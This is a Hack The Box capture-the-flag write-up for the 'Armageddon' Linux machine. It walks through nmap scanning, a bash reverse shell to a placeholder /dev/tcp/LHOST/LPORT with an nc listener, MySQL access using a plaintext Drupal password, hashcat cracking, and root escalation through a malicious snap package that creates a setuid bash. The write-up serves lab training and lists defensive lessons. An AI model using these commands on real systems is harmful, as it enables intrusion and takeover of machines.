Hack The Box — Armageddon Write-up

Armageddon.image
Armageddon — Easy — Linux

Lets start pwning it ❗️

Reconnaissance

As we step in the box the first thing that we do is to use Linux built-in tool nmap to scan the ports of this machine.

nmap -sC -sV 10.10.10.233 -o nmap.txt
  • -sV: detect the version of the service used
  • -o: to output the result

Enumeration

bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'
  • -i : this flag is used for interaction
  • T2 : Terminal is listening for the shell on port 443 nc -lvnp 443
  • T3 : Terminal opens webserver on port 80 to transfer index.html file python -m SimpleHTTPServer 80

Privilege Escalation

We have already gathered the information that Drupal has MySQL database setup with it by default and now we have to look for the configuration file that stores username and password for MySQL. After googling it found out to be stored in /sites/default/settings.php ,So lets check settings.php

mysql -u drupaluser --password=CQHEy@9M*m23gBVj -e 'show databases'
  • - -password: password
  • -e: to execute further commands
mysql -u drupaluser --password=CQHEy@9M*m23gBVj -D drupal -e 'show tables'

Knowing the type and cracking hash

hashcat --example-hash | less
hashcat -m 7900 hashes -w /usr/share/wordlists/rockyou.txt

Exceeding Privilege Escalation

Our next step is to login in the machine as this user using ssh that’s running on port 22.

sudo -l
  • -l: flag lists the superuser command that normal user can execute.

Creating simple .snap package

Creating a malicious .snap package

We will make use of chown command to give access to ‘brucetherealadmin’ user to run bash as root.

chown root:root /home/brucetherealadmin/bash;chmod 7455 /home/brucetherealadmin/bash
bash -p

Lesson Learned

  1. Never leave web applications outdated, always keep an eye on them and update them regularly as they might give a shell to the attacker.
  2. Do not put default files /sites/default/settings.phpas they can be easily accessed by an attacker if he gets a lead.
  3. Snap packages should not be given privileges to a user to install a package,as malicious packages if installed can escalate attackers authority.

Unlisted

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store